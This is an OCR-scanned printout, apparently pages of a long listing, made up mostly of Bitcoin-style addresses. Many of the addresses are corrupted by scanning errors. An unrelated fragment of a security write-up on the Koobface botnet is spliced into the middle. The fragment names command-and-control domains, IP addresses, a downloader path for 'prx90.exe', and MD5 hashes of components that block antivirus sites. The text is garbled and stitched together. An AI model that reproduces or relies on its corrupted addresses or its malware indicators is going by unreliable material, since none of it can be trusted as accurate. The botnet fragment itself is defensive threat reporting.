18rmQKvBhREeejYuRGHMW9YKSA9xDa4JkIN 
18rmyYUSaDv1murJDLDJ4EaEZ8NPZNrMUG 
18Rn538JwT 7KcjANU65w5B5nAM12X2QjNL 
18rpx29dExdagXaewNRjnCHQjidPEn3buZ 
18rqSx5LMf7PYvxw8QTKgJWUV4LLSRxQxV 
18rToHSUtMH90xZXFgMp66EHKn7kPjPGdT 
18ruFhyPCUu3eJQJdsNfmvnoRtyQd556Dv 
18rukYRY75bkemDprp2KXX11mfGnUEsB9r 
18S4TTQ4sAul16LghjWihY2cUcwRhSh5TnD 
18s4zBf3eBrDRNTQrsn83mrC85f6z)JASP 
18s7iQFqZ8FZD9EnBewBtV8HkHtcGqbSzu 
18S93frGyBWgUHnEpK2TibYC1h5dVKmysf 
25404 


18SaxWfBP2oLqdZygaNa6eQfHgtKkX3YNo 
18SBUyZJbK6YedMWhjUV1cG3PNJM3o0Tzqn 
18sbYvNoxfTkocjLebW8kgm2PcY89jsDDt 
18sD1uZk3rWPx4D2VCWSYHnizSxxVjoUvS 
18SDdCkc4MfR3UICfzqXxgbYu92CKS6MEb5 
18SDzfM6jJyomw8QFyAPWAAOWUS5PEtPx2 
18sEgxdQUjhKhjQDw97dyTsGqkBFXrotal 
18SeKdCW4aqMpPKrnd8bGVNAe5wc6o0P2Xt 
18SghQmtGjDaUre3yyhsfBajeMrEDAkEt) 
18SgJWBsaQXRs7M1FdAnnog95VBv3Ykii8 
18sH1gLnZFmvVh4essz6NGxVQrYpCs4rii 
18Sh7vNt8z5F5LumB7uL9mk8Rz6bers8Zu 
18ShJqwMsG6C54eUYmBdeqyNtxFCBAx6p) 
18Sjn4hP1QAZPxCmrdxNozZvsBDM8DzWaG 
18SM8kJPFF2NSb9E998qgLCxoCqacxv5EJT 
18SMGMkAS1Xe]vCoMeusTdDM2Lesdcbb3x 
18sq4vQvXNrVVKCdAeF RiFrMHDytYe5gGE 
18SrYAt5anNP79y73uVMjEtmgFnEbrcsNt 
18sssBv4M8seGp79pB]WQxnqEFSSDBYxKz 
18STkcSB2YktiZp28CT13r97WmXcGF2NtJ 
18SttfZScJ8VKLNWHFG7 PHF mGejqtBj7WB 
18sUZZUEg6JCxcr3vB5UUZLaQmMUNFWE5pC 
18SZxTMMudZxSTg8QLUQEKXxErELzX5mcxE 
18T2xJrdRQJHwGmpVhcG1CkCBz2hneTfc3 
18T61peNd3vovBfT kwm6i4v98GGRxGpmzH 
18tbXGGkSrZRtJTpFzcnyaSaSvVZEPACDz 
18TCbhdsicbBCSg2HUNBfWi9Z5W3s6nfvH 
18tDNBhbgN6x1sXFeNHLmT2o0hCdeCqASZz 
18tDqHGRmcFxoovByTYDZh9rqusDUxuMDD 
18TG6baovpHdbGBSFUeVKoSWWxcqPVeRVG 
18tgmwTJfDAeAgY4wXTKJUYiefem2raDTA 
18tGqVgwerCNBRmNhs523p9FNnXFuksVRf 
18thty1cxYzuztXYm3ThDR3FdHUxKX5dfe 
18TiGyJKfstGFcbTQxXUmvrWurJs8KtCFn 
18tiWdVPi5DpdtXfvdfnUuzFLmM4HFeB6qC 


25405 


18tj LkmmN2xuE6vAKECbfCww4agXSoPCnD 
18TLgQK3ggSm1hfbyRrDF2dYLyBoYjQVmL 
18tmXu82Lqqwxw6F9JMJiITHV4VJTMSy3W6 
18TNjy9ugJpkp7QWUy5mdpPPQXK9SMfZp5 
18towCHSNLiDsRnrFyqfREVGCRFXaxgJ6T 
18TpFFHRx8Jc37NYZ55ZAGhR911a98YMfz 
18tPWexSDpWV5LWbYEFjjgqaAGmZnVRg1f 
18TQ71ta2kKUMcWk2YUucv3BeWTBjqZaacxX 
18Tsw8w/7vJVvqkKXgP2Gfns6UN7KNrfv45G 
18tT5bPDNa9SGh5BRVe2Er2Y5T TAaVJ3iL 
18ttuTbGesBS8MBTmFdf9P5KCX1m5nxErs 
18TW3VtdVpFMKtrneESfjzp6iwc4at7k9i 
18TWN1w5WtyVo2xsnkNhjUJnMeX5V7Dr1x 
18TZEwoQy8JhU3m8fufXwThEqNet9j8Yc4 
18ulhx4tqFcXMTmDitel16zcSGB7yKLWQDG 
18U2Zpt6DLWcygFqp9CiZFsZsEFcUnpuKu 
18u3x1lECCWBHkJHJWSRMkuEp7vZJmmpmnG 
18U4HNHUnF7Z2XNGWcX4rE5RJLS2uU16VLB 
18U7UV6GKQrENEVQ4kS4Rwjb141P59tARr 
18ubg5iFAqBaSBBkyJWyZow8hECVFWTU3U 
18Uee8LPpzeDbXgHvakRJRPVPWQob32o0f1 
18UfwRGSWUGX7UEFsbvtctwxMKolvPQq5X 
18Ug2QUIEKQZTtFjpR6iviSoRP8Q4SkG4q 
18UgbpqLZtjFCr6éDBYXU37hLVz6ZatNhKZ 
18uGZmYdnAG7AQ81Eiojo2awpabvMWh2R8 
18uHwmBwgbJEun7BJLBsCZ2czi4tuMgeta 
18uhz7dtcCdG3SXrc8N88HeUojghBRdS78 
18UKimaeD1kP4SP8TnF1S3sC4ew4qSCC4P 
18uKj1EZAatgx4T278zpJHNyfuhJsQ8sgP 
18uNCVbJa5H7dFHNC4MdWeNvuwRsLVBcBY 
18UnrsPhcpmax4PWgmG4V9o0qnUvaKA5G4v 
18upRKhpRr2GMtUW8cR6dWMNJEvzQxbQKc 
18uq3QErjNHsDnFGfTJ1XWJGJKH1B98U6z 
18ut919B2R3e1lgaEH4BdKh8voCs4cngdmj 
18UTolaUNculoLrNhmT6AjhQDuptxkH3Kr 
25406 


18uveJ3ZxaMNdmc2GfWARYWHJhdmWcamgu 
18uYMTeZxNLoANKv483CQUtVqx7g46fZ18 
18UzZFfT35Y2Ky2E4Gpms8SX5v4dNVXEmhM 
18uZmMVq9GTh9hMjibEDXtHVwWTFAQKukjJQY 
18V3j6MBh9AwWCKMSU7EMgMPdY31ShPT1v5 
18vbKgWXAEG6NAaSo7rPxKBaedeCwrAdrE 
18vcsFHaStHa6cKiUuGheUikdLhvATdajJ} 
18vE8YqwytKM2tkdSoU8ybvytHzZhVPxvMW 
18vj9SNZAzt4Rb46kKKVHRZRx6uUUVK8WEXV 
18vjGejGcVZDynVUcZBc9Hfc75JWDM5S3f 
18VKGm8g4YxqK1jeZi2rxCoxWYWxNPR6ge 
18VkQbwuEkPGU5UnHWPP6hBEWtswbgGXFG 
18VQn1GqJn5tD5kCySMYaS4B4B41TZKKHH 
18VRU5MLJASmUTc8QdydnDXaewnD9thbcA 
18VS8DJRFZZqmFRZQ19MxgYogmcotX] 7 NF 
18Vt4JUdDC9TSsspfxfgoKA2 TcZ3tiL9JC 
18vtEMxGhjNgtBzTNGy5inWWz9C1xGSbvt 
18VvpvNzKoaYaxa3GGus5Pz489ZMSr87bC 
18VVRbwi69BfZDVWyZe3vosDzty9D13yKP 
18VWyTTjhjh4tkds391PF4MzJDMHHqwd1f 
18VxZoByicdAXudyFi6PRNTuaBJ7LBZD1Q 
18VYCZqyH3ko26L6iaAd2ftV2DqSwF6giQ 
18VZK4dvWgQEFgLhGhJ6w)GuYa4B8ZLcu9 
18w3nCsVroELpMf5iP7pXQasMV2YZz5SFv 
18w3t9pdLvEpYneqP6SacJAa2rmGm/7pR3S 
18w41e49sSx3eSzm26L6iZ3rL9BAvzsF2u 
18W48sLWEczxs6QdCNRtZSwzv8KBxBXPDU 
18w6AWZzin5J2k)XghumK4nfBnAv7f5F5KV 
18w9v6pph1YpM4EEvWaNJaSHaqJdUwl1dzNa 
18waJeJ43LzZbEqjMDxPgLGwPfqiLM9EF4c 
18WctkoJfCt8JoFmXNGuRMYhq7ec3pCuUa 
18WddooYMQaVKFc2CrcdndRHZS8BEzBEFe 
18WdGSe7cv9acJZt2UMeia5WeWVLAdNe8w 
18wemVQzkotQu1lhCCpVbpkiUnyfEAyNn35 
18wentpyA5GwGGaRvsHfGFAsQrrmKFGUWa 


25407 


18wg4VfQXcphjuMxjSBCv5EW6wFiidtN4k 
18WG6moRaQVHtudJhWsoNCn83tgJofnsfT 
18WGAUZz8x9Bzhexp21Zp51UVer1p8jJHajBV 
18WGAXpQDtzAMakNFXppGDsAXvrzjUevSK 
18wGpaiwkr9TLW9Tp4rPXPwS1tH4bVhavVP 
18wj1kF7HtskRNtMsLSnFW7noJWr9SvVoQ 
18WjXQg9Hy6GRfbdz55NyZMnxur9VJ2fjv 
18wLHSxLdMaEBVnFSarUCxHFwNClguW10Y 
18WLrWzUeggYpmcn7qjol6HnhzaevéfkG8 
18wMiMZ30yyoqau29ZMkuMKybYvyyrgErE 
18Wn2kuUKUH7frMozHYBeuSVe7yYKFoH41v 
18wRgzdhkTxgerhAdz]8fT6Syyl1mBm5eBD 
18wrLjGkiMjyooHy7h3nB8L8peFPcoJTcZ 
18wu72h68pJWL74CBSgB8wNsk5hft4PSD2 
18WUkKkyPDkKQWRC29SN646enQkMAiqnDcxX 
18wvcp5i8juEWsdvPPbvhh 7Af8Ykt9eyLT 
18Ww3iPHYdouo6B8FwLLexpGFH91PBR97U 
18wwc8vY1B5yCjAp2V9ONBRNZGfqWmNG7CZ 
1L8wWnFTuOREbVVJpu7P17QLXiKL3Spht32 
18WxQCBHgPVmKeEZ3b1GFETuaPUrxoiVzG 
18wxVCTAMN5FHUwy43fb2UnMGgASVd49nS 
18wYATuao3mrfPFwVwf3qfPnzz8wxadx7H 
L8WYRFAZX8kY5rQVAEZKtuXLfQETJ8zfAd 
18wzRPdZzpLT2b4xFNZawDDziUcesVT15j 
18X1S9DQzMycSVUaJTZeDZLJbSFJBFY6aQ 
18x1tYrUfCdTRaAk97V2XgfKhokBH3590fi 
18X2CkaKsKev8ATd7CCPoGFhgECaKqAMHx 
18X3MKgG8)xiqHtff9L9m8n9LjS5UHnTyNy 
18X4T6RhWE8t2NiTkqyPGDova5Dwh1dFha 
18X50LWGTWV1pYmmPyafgBRUnhbr3zEmbo 
18X6BxAJT2E0oXydgNKTx5rPGWpSsxZXUr 
18XalDoyvrirXX30E82c3KqBsfyv3qofrz 
18xAPknjmpqWbuucMd2bbkvhFaBmu4zjJP 
18XB5wYTUEUEA13UsGyjaeSwNPsYBMSfy 
18xDpH1luyZArTkoFtdJWexRKjm4yzPsJoi 
25408 


18XfBiib3eJmcfWENgK8j3fPdZVVQWEroN 
18XfCLrruUL9JGnjt3GeDPF6K1Fr844vle 
18XfgMXoPHdul16GdwPxAFX1zpoXgJ6DXWb 
18XFwtigobrn5hSfHUkKTinzLcx7 7WJEkJq 
18XHih6ZdRZetiZYhnSxtkbanSQLGPs4VT 
18xi3GkFi3fDfMg5ZCUBS1vwwMgddBqaEs 
18XkQF67SbqUQeMpejxTSYcuwQkRp8Q2H4 
18xLhEBeo6V84HRa816d71wFQPidTyReK8 
18xpMTWcjpaiQwMUTVcsV8KETINRERUrcc 
18xR9ZUK9YeTK2y9kAfaiNvnhq5Flyn3Mb 
18XSJfCLDMYy36yArDRyqNyzEeoNgq8ngbK 
18Xulf2y2DDptR7iFY2dvnfYQxtpnFZSvg 
18Xw5DPdX297UyFdUFZGiBbsQ8wizCfuYm 
18xwSJuSnYFELVJh3vEtm6UQ5c5 7Jow9r4 
18xX1XZ65Kkh474KoBTHQdvRXzLG2ztYDa 
18XY7XqsGrrtWQkS8gP3scfhjQf7vzWyFg 
18XyBC6Gfz50kP8Rpj84xXJeumq2wB]wFdg 
18XyGKWJLRasjRaAJx2UN3PwDGCx3UL8U8 
18xzNCszTjXqdNu6pEmMCWZU9WeacJZSBxY 
18y4hqDCskUen9JX2Q2mMUJnoJ404FKiPVK 
18YbVgBNGng3kdgoaHTMhfky8S8aJZtTYb 
18YcjGkK7AXkD8KAbZ2MUEUXHITEYf52C15y 
18Yd9nfSintYaX4DrjZJ3GaaNyDU8eJhDk 
18YDDVvkuariQyAdtpJxToSC1Vvh3SRweo 
18YdHKFGc8irmrnm9vCKq2QuDMmE2RNJyGK 
18YdWiW6grSK3gRkWXmbCfdeZ5Gy6kF7sw 
18yEBoyw3uUKQEpBBr4YXmfvrSyto5inye 
18YgGG2RxaZeCi66q23Up24M6SWs9CORGF 
18YHu9rUMdaHzsXEtCZMZ]JgiLefm9JPV9F 
18Yhxe5YZiIKQWEDxnHF1X4v2VtGfUwky33 
18yJxJhVf2UAqyAPY9nAMScMySWDnoP3sV 
18yk30J4KY118DSF6eEGteBipZS8Pcnfjv 
18yKuRxi8G4vpTx8E1np5kuCu2UfNohysS 
18YLMiWtsYrnezkDFw7QMyePLAhtEa4jiv 
18yno1McpTWto9PxR4PUH4Ly9sfUymp6UR 


25409 


18ynoiRdvhexGSZkGxRmQBJe8FX2ZZSNuW 
18yNu4zkCP1sLkTbm1xd6Mc4jRJ5Z8kKMRc 
18Yo85Nb2Ao02vTJB4AZej 7RG6FWSKt2etf 
18YQ6fb4GMHbZrHSud5VCGmRpKLv9XgxqG 
18YqenRSMNy1ZKkJKVXzWKiedhb9YAqSD1 
18yRbTGzt1liACQm7FbTVSJJvUjVUCUtFjP 
18YTVETOX4HNOWBPBVoQyMtnTZYE7rxJAq 
18YtwBNgATFqc3rio4JnFVu4qBPp4zq8Ly 
18YuqSfgf4RHkMjfqk66Dk3StNz9XYGrCA 
18yUrNehd5hDJ8rskKRHGvQSWtDhP6ijJLiJ 
18YUt8CBe635hCRcF6édv89WDxwnGrsRj6A 
18Z3igezASVF6TYWCTLWMdRzSgV7MonyS 
18Z5kndPpQhB1fAGoPT4399Czbx7ywgU9S 
18Z68s7peags6KfaR4xB7BTJfFVGsbfJA2 
18Z6YbqbMCcAFhz2jtTGfMxHAutiY3REXz 
18ZbtwxpTQPUjzbi2Z8Mqak9BErs8tJSfAq 
18zci12HK9CZ1NBSrXzmSrnqXdon5ypcBm 
18ZDjnwByPWogtgeicY8HoPw7swPYquLLjK 
18ZGGXYPWpRc1o0AzZKVErg3BaG2Ep5uGDCm 
18ZGUMcjdgdEoMtiH1NnzULuavcAqay2PN 
18ZhbAWc1kT2U2vRbQzs3adDYpVAJyNMaWw 
18ZJ1Tt1PS9UfXUFN7VRhQZNo3QHVCr4jp 
18Zk85YUvnudGKBbMfvUxm3ydtbTAhPbot 
18zLaq4UWu8QGSyeaGUnJRW5EKD8RAk1w3 
18ZoKKJNDqWSrpVdKSfGVGL4kaYC5boH5n 
18ZpKkr9Sa6h8tBV2sLDNUMLbpWRgB3Cjd 
18zpoxh6eu4 7aVvKZ5kjaD3ZUy9gGKYRuj 
18zpr7bvmjvkmsm2iaueUCF DsezjftCc8Q 
18zpvnC1RRcQnNTEryb1GjoR46d7b3adRa 
18zPy3yxZRHzoZiv9qGgJpReLP9K3uiel2 
18ZqfMcowNRePeSakka6ngMjvyri91W5Cb 
18ZqN6GahHHE7L4xbqzMBLBjx3wwC2tUbn 
18zZQQsqafy6wzacdVPQzjEXxAK1AKKnZ1mw 
18Z2V1WGWCbqb632n4dPXWjUJTHymxFc15Z 
18zvwScQrbRH4Uh3C2zSzTmciMe7HYjvX 
25410 


18Zw1k6KMiVay8ZKMAS5G2VJ9mr4JrG6BR 
18ZW3awVAAE87Pn4xZJ7gQUKPKznbo5Y8 
18zx0oTgGURdMmkkjvFsjkKNUuDb8JrDWEfeb 
18zzMtaprqzSBuaFFxod73LZMz3Xspm2NX 
19131LTWMfidgornSEH8gtyzx7p8C)JEuH2 
1914Zr5FFSeegGCX4umZYp8nmnsgAbDzyX 
1916afUT80N3VUVF5N9SLQMcHQSLi7DY4q 
1916Lg5Vs7TucomotWQvh3iDLp8AJRm4vi 
1917HrikVqn9v7YggHxDgq8vV5BvXerdL4f 
1917L1LURXVmMQcWRt3uFbiyma9PNRDni5Py 
191AUUH7ZQgRZ4Avv77U49wWjFkrbjCPHps 
191DRuJWCLvw9wzcMdeA4kbvJ9qdMF8Bek 
191gZcpXrNyxdnw7unhiGMNJnRSywLzp28 
191LXh2dTgPGYDk4Htofhebnk7ReiGVT15 
1923x3y5ptnqEwh8toFiRUszqNUdRXTCC3 
1924rgfClmsdTbC6wj48KgbLZYiIB9D5skW 
1925x55HDrBoPaj4zVJUz|XMnZs72HSVdE 
1926GGajYTrZ4AMjwC2zUSaBPtFKBSY8GR 
192Ap TrkKMhkf5DFT5yL43JyCu8x6PWkXmq 
192Bf3cKXYx7TVueA36xNU 7Uxm4iPsHg3x 


192HpKRAVFBZXdEQBWbFG8NLcCHCZcN8DqN 


192HZKmq1lkjca3aDDjNCXLRRjBG9Z2E3SG 
192KAfknEXTAiVDUONKGHBa4E28QNSsSX8E 
192q25VzVHh2CVRcWfrn1S]1hTqRidN7oK 
192qbG5N2Wcn2XVgKZwuSZBxbAXGjHkikY 
192tztVpLBvtmBzo048k897gt1l6avjQZmfs 
192UE4tbUixnoDH5fZQqvfA1zWx7EsBX2F 
192uUUxu7SWA862E7nufMnzvEHRNKf]pVHp 
192YqyWMxcdG5cvMJMfAdLtlm4Gu1pVhu6 
192ZKEARD83JRFRNW4apJ325pfiNp6eazu 
192Zktbc4cNPhKs9rUavgNJjH6RF7NXBgh 
19334A8JWek4P4emznhPrmymejKcvmjacp 
1935QogZNqk1XM87CxP93UNn7Yjc3QrUCa8 
193D1lyarHanBhTETZ2vEAZ7qxnTzgD2Pqor 
193E78DrTJbtzXNy59iBh4h8D12f9CPhND 


25411 


193gAASbwWM1KYtTZEMv3t1ZSNEg68pnFyx 
193gfXLUjPSHD7DJDTqlvQ8qFPxf2diwTB 
193hno8u2U7nF1tUfYEJaykKGQyFNelujyW 
193KQZH8KrGoJXfXuYlajFnjZZ9RDYX7 xj 
193mMQAmGKaV1icegv2RW3DroGy84QEywJYH 
193N9bw37LRjs26NmMCSN8vVERN76MnbNU2Z 
193QJFUDSEAEvugrwWsLKgn6jeSjSxJu8q 
193R2mxqpKcSseNJTmhWZ4ta75Cqw7LnCR 
193TPV5CHbgZGGKg8ApdxXUxmwpe937Ga1D 
193tqzCaEGbUDW114QwZYoLJvEoB3A05K8 
193UjP2FzmakKxLBDTVwbj4MdrN8yFTQinS 
194bGcMtxVykpGrQu8uvp6bJm8WgcHP2pf 
194eCwiVebmvEDRgty9PdVbgnevfCiVGEq 
194eGVVz2Kuj5Yjygd4fPRiclwY57N5BK8 
194Fy8MXiRcYsWWuphxaQx1NeABD3xVbel 
194Gf9a252Gwg2NyyCyj2aeTSoc8SEvbxM 
194GgzachoG7ZaYmZjikzjzqVx25y7pcqZ 
194H2LwPei9WsyW77H4NpdKMjhrXPrDYKu 
194pqh6VJx5gkbk5fbwP8Y6Syyr8NZaZdH 
194Uv9NymH7DBx2AfKkPcJqtXSYwaiyxFh 
194vABB8H6LLgqqQ4z94wTDEHIExjLEPps 
194XzYdQHfb5BNWHFKDMjshrMWHjNwWccw 
195bxy1liEDMKFXob33WQ1iaCtE24yKbaFK 
195Dbyv7QbW1K2kYLqg7YXarZD2YVXetr8 
195DBZQVK3iuXqWwLiP6SgaERfxXyw4S6Gr 
195ewrwVqqPD7pwCVCmEoiswqw2d44fxEp 
195FGJEBEkKD51rgJvRQHKi4r8wJrile76w 
195gwSCCy35erABS39pqKGQMQNEaHQxWDc 
LO5NILRXVTDgQUYTkKX45JyWKxhBJKvVzkP 
195pdnuRv7ixwCfwF 7U5rv2yBvV1wx7JM3 
195phaUWwSq6CEiL8avFs89FjktWbnAUg4 
195qccyBW985yEg852rbm16QDYS6LBn3mS 
195TfdHg4B3VrfCHcunDWDVv/7tkBJ6ZLr4 
195vyNP3vKbp2rko6rPgdXkyKydzxVHHvd 
195zbMxDj2RcKApRD8cLGXTRj8uyR2BwSX 
25412 


kiano-180809.com 


kukuruku-290709.com 


pam-220709.com 67.215.224.0/19 ————“S-g» S22298 


67.215.238.178 


rjulythree.com hosted. by.pacificrack.com 


$uz11082009.com 


ul5jul.com 


So which hosting provider's services is [12]the Koobface botnet using for the time being? It’s 
[13]67.215.238.178 - AS22298 - Netherlands Distinctio Ltd, which they were also using in the 
beginning of the month. A [14]new domain is in circulation across social networks/micro blog- 
ging services - kiano-180809 .com/go/fb2.php (67.215.238.178) Email: bigvillyxxx@gmail.com. 
Take down activities are in progress. 


UPDATE3: The entire portfolio of Koobface related domains is now parked at 221.5.74.46 
- AS17816 - CHINA169-GZ CNCGROUP IP network Chinal69 Guangzhou MAN. For instance, 
xtsd20090815 .com/youtube.com/xexe.php redirects to the actual IP 221.5.74.46 /redirect- 
soft/go/fb2.php with piupiu-110809.com/achcheck.php, web.reg.md /1/[15]prx90.exe and 
web.reg.md/1 /[16]prx90.exe as phone back locations. Two new components are dropped 
DDnsFilter.dll - MD5: Ox8904BCEBACB2B878FF46C5EBOC5C57EB and DnsFiltersys - MD5: 
0x30DD915396E46824DA92FE70485F7CF8 which [17]prevent infected users from interacting 
with antivirus vendor sites. 


boomer-110809.com 


piupiu-110809.com 
221.5.72.0/21 ——Ai_», AS17816 


$uz11082009.com 


upr0306.com 


UPDATE2: The gang has responded to the take down activities, by using the only IP that wasn’t 
shut down 221.5.74.46, with piupiu-110809 .com, upr200908013 .com, and upr200908013 
.com already moved there. 


2544 


195ZHEKgCSd8tXuyyE8zsQY4asQxQkR1wu 
1966RPasMMSgMFEcJkzNyXGRRatFtigmnH 
19698yRT pYXVFHDn5rtGSC837FKCTLUGQB 
196g6qfeis33tvu7dU7iqC3NNogvdUVuqu 
196jQrKUEEL2NSEkKEjoE3SaCVNUwjmM7Mm 
196jZs2gTScVrrcE4AgFfh9TGRmgq5LquUvS 
196LkLWKm8kCypYmAXh2e8jsRNBpLrH2U6 
196nVQPWE3ChfCC3nnzcaR6cCUNx6CKmxoP 
196qgFHhWiHdYXUDUuXxHFSZM 7r7KGZt6YL 
196rh4vNV34BbQq57skysLc7qvETttMvSQ 
196tEJwhCfN8GBMQJ2Z6SsuWc4oht|myij 
LO6WgHAry3M4Ywoj2CVzkvEVAaLDsDZKN1 
196XpPeKbJ1YsMCtScEKxpwPDuCxusTiy7 
1971TPWRsEf83WQtjtYC74NHTMis6KMbvY 
1973TYGi8721CwFYWpD6LbirBFRmhEFqHj 
1975a269)JJ5J9DF2DsevKnCHM6Q3TKcpK 
1975TKDmpRLFAkywBiU4addn56UHe13jck 
197cyCQMWNHMDjMoAS 7essxc6eZd8kWyUs 
197dJGTbMvbVa49TLWsS87SMG2d1xMC7q9v 
197DJouDmh7BURisoPz9FQpadD5uhvGry 
197E9v3uCj4f5Qn7rBbYC758DaZzVM95Nq 
197ET4eHoWHtVuzulsjRaqUuiSoor7hP71h 
197fpkjfeStKqnf8Um2LWYDAoikqcyPj2R 
197hQ8qsBTfoFsis75Zwx52qmx8Mnepmh} 
197jzVtsSwjRXuLaBwGFnWrDVetDGfpxq8 
1970PZDZivUYHb9r7Kp1xMYArTJQL67WBW 
197UjJ7y55JruZSLJFVdLbUMKPPHUHCMG3 
197xjfLST21XEo6mhDpcs9W7rctk69syDi 
1982AfdfhxtBRwzqCcaeMavQE5ziqxihix 
1989fo39eLGJa2YH9VDdu3pMm5WyjDzxvi 
1989JTCBY8u6SDAVDcaeqkKCyeCLWtWDZH) 
198adQNQqagjs4Rk6kZSvfbLAvt7spGhbxu 
198i9sBgR3ZJ1R1tZtQU8a6SZ54VkKNJBc8 
198LnhSyfoMXhnqWuAuCKC3RQDin9WbgpW 
198mzCgy878bkMYd4J5e7jFDCrkp2qmgh1 


25413 


198nQMUShgNVG1FkyX788hU2YUL63uu37b 
198Pwdu8RzV8rAKA9Dx3P9MXECyQ8qBvuU 
198q6x4tBixbrMuzHt3zDzyhNFDWLPRQSu 
198qQJ9CXkokZJFdgBw2s4uRT2iQERSXGF 
198ydM7h954kk4za9wFr594Kc2bpZjs|JMa 
198YLDtdF843aPyJSpLqtM2EyKdilYXSn1 
19939ht6CJZsj70BPNCZ741qgmQKQqwQEjm 
1993RaMWzgQz4rbjL3XGnvzM6FuTAmMRLBH 
1999dAKHxZTYKfa2Pk9z18ecYNjwyhwYm2 
199bBXWtyA89ygnycNQdQQV2Q5XaZBEena 
199BfRhZ2BoFxE4R6epEsHcbhcWGyRDBWG 
199C6YPK3Z8xrrlatDuJoVkfMGqNcAvYLc 
199EQGiswbBleRaYcpECS7nDrzThhKab4yY 
199FS3Fcy3fyv2VYR1iie6YnadGhGhqZCP 
199hnDLfPhyTGQWjNSVqGcwUTRQPTqohCd 
199iLrHZHSZZX91b6hpRLBGFYkFn6D2xsM 
199k4S9SGfrHHebmT8VYRu8gH4eNpLjhnk 
1990CTqW3qoDwnidMN68QK25FwvFdU22Yw 
199qvesfCBX2eh9GD7spNg3fhffgcDXYPs 
199R6UHMUGrmWUx4UfbmRQZj5wafA43uQ2 
199rveMCrbQLJMkSbD3LAAS4DLNH/7GJfK2 
199RyuHseKcKPP3dYyyMpwc74mwnkfV1eN 
19a1WxuuPLMFMgTyedf4p9gmfGxzLkKQU9E 
1L9A2tPXNK3JSCSX5Rr1IGEZ9rb3vYQyiojV 
19a3530L2zZEiVPqTZk8n67hH4MuvNug5t8 
19a36DYXocqKvSxp7Cvy7ceth4LKXgmSAY 
19a4nk3PE2p96LvSRD6pkHNpiagKwnhxX4w 
19A4thzhK8Eq6PHbR6eik1cDqH9HVjrYA5 
19a5SwxMYT50m9HDoUadLQxXStdGWDMGotx 
19a650PJLYCtvgVyQZNdB2xszhPAjJTZ7k 
19a6DRnNREZWX7oigjGZTBZqUVrAaoEgGYL 
19a7arTErBAC2Cdrpfhp2fZqnHmpPht9eQ 
19A9GjPL3B29K76AzZU7WKsRku30h2DuFAG 
19A9GMm3CVKrFzk5E7BULDopHf4mNQ2tb2D 
19A9tWsdB68KZgcKYcxHYtqn2sA9HR2ZZU 
25414 


L9AAB4NAnG25GpFifjxuSU31dxFGcnURso 
19aCqP1pb3KBZuxLsiQaiGQ4U8C5MSn9jZ 
19ADVuoShZmUnbRcqRgGqdUBdPkFVEumAB 
19ag3sUuUuv73w179jcKWL76BdX1XDP3b58 
19ag6W2VeZvdDXeJuEqG]4GobowoAP6ews 
19AKbVdXDnyKp6fAC6sLDvfqydw36xfl YW 
19AkKwyCdntewxNrQsryBeMC46ZZnDTbba 
19ALUVWBTHerkqWvvmBNgTWajNds41Wzao 
1L9AM2kF6V7zZTNnbbFt8wPKUXWQKanwB2LD 
19aMh2gavGDakXfdufAoqGbpQMMGboNigm 
19aMLHoRrkRgaFm91UmMES1LWFGc1CGXFPH 
19ANg1ZVCVMqWpnPxFAU6rFUUXg2TveDyA 
19Aorn22kGtgrkaWioquNCvQxjcSodUMNn 
19ApovY9DYaafLTLqVPeboFbqd8WqUCeKS 
LOAPPNrMZFcQdsnjor4rcGau3iDWwFdETg 
19Aq5gHhdTtNeEpi9Ntdnn5j47Q7PK15ac 
19aQb7XCc2GZ3Eia6mBGEUMS68Nu2WZNVs 
19Aqxz4vHyQTNKHrAFLtQQKGbbEswHghHm 
19AtuP61E12tK86FBHF9WFhsr50wxnmFU7 
19aWnyj6KotyWDh9cbSzamkxDEyGkdBuL9 
19AXr9c9aNtw2k95wDdjVEmwjCvqBPbcJ6 
19AyxSCHvS3fc8W85JrQ1BjcValnmPcLyY9 
19aZFAEZ3WPvxdFXfhLUMvKoEcSVFXm6s4 
19AzncoNiVm1Nn16Pi2xWvidbLRrRFm1wM 
19azvHKPZW443FCqBrjeABMEzYaBz2hwm3 
19BCuX9RAa2uqfQ77XLauAM2wTgpfUihPd 
19bczkq9btni9VZmrnntl1D2bbHFYC5A3EU 
19befldS6soPmrwUYrxP4UZJ5u7PuaMo3g 
19BfcTeYDj933TZUiv7qMebBep3fBfVKcw 
19bfzDvaHYwV9SM7tnxVZr38XWin74whZr 
19bG2WrYwpx7WjJ906PcKKdRUsgPXiktqA 
19Bh8cZU5bRIBMB53KCvhGjCZ2Chpt9QtA 
LOBkFdWvZy3K4xksN8gDndgHGog17eDc5M 
19bL9Vxq9ScrgAHUs4PYArL5j75htP9dyY 
19bMni7JpygCzzjkLsDGrFb4HuiQuMtz4a 


25415 


19BNg32MkrjXSWLBabxN6iAgDxGqBABeU4 
19BoiJ1GFFAMJunWBQTUcp74fANMswEZDC 
19BoVDkiTMEcd8MMNm81L5HHm/7DTJHHFUL 
19bp3ZGwkKh2X5vqxXpMEvFDeaWDQsc4BHw 
19bPJDBhX1H8bFNEmE1sd24CVQugZAMDBm 
19BpWugXuM9QejYvcPVCn3Shx7a8zJECXC 
LOBQVjw7U9RyjhALBZWFUKZit3gVBp6424 
19bSefRDVdN2gon5tw3R4dEncU9mv6LEQg 
1LOBTA3VVJoDBSfn6AXZBG8b4w 78YrNovQi 
19buQeqFgFn9fYQTbKFZQLUE32few2hpo6 
19buYWaMUG31ydHtaHiEVa3U7MskK3Vcnff 
19bvpHppLvfB5H3tnbqDWW2APgacvzhul4 
LOBWCwVfRAKz2TVibgYkKLxQs15FPbXB55E 
19bwnFgZaKAK7wPJe5a7FagdoSoWBXTwxu 
19bXEbAo7ZttLd3Pqe9bTRiViw3FKrfCQL 
19Byc5bnsorurGMqYCUwy6DiMvpZjngMg1 
19bYKdMCumLTwMu9FL19u1tMRXZnbodLmm 
19C9rBUVBUWTQfgTXAbromRbDeVCA4HWRB 
19cacoL4yRcECXnR3HxQRq33KYeGDVn3yd 
19CBpypdmJzWd3rqla9KFoMcjLNmMEFqvpW 
19CCCkvHWjTGNpoeqySxEMDBDNgGXD4JPX 
19CcDj80iwz2BrpJASHMi54DqYmtbwfM9S 
19cdDM5L4MJq5GeSPeYzJcVGcANAn7e/7pf 
19CDWZFvdWG9jQNvoUDbefnQj 7PYwTVay9 
19CE2DDqRPtGsnrWFkH76dndJBk9GkiTn 
19CeKJ yqHsMhB1GdtfUfUTKf8BZmLFxNu4 
19CeLcCgWaryV3sQujeYQdmQnYctEPjJHH 
19cFL9ijntrkyC91bh21aWWXQon7SjxRHx 
19cG7t6uVa4kb4fHoEFhdFkbv6J7duAquF 
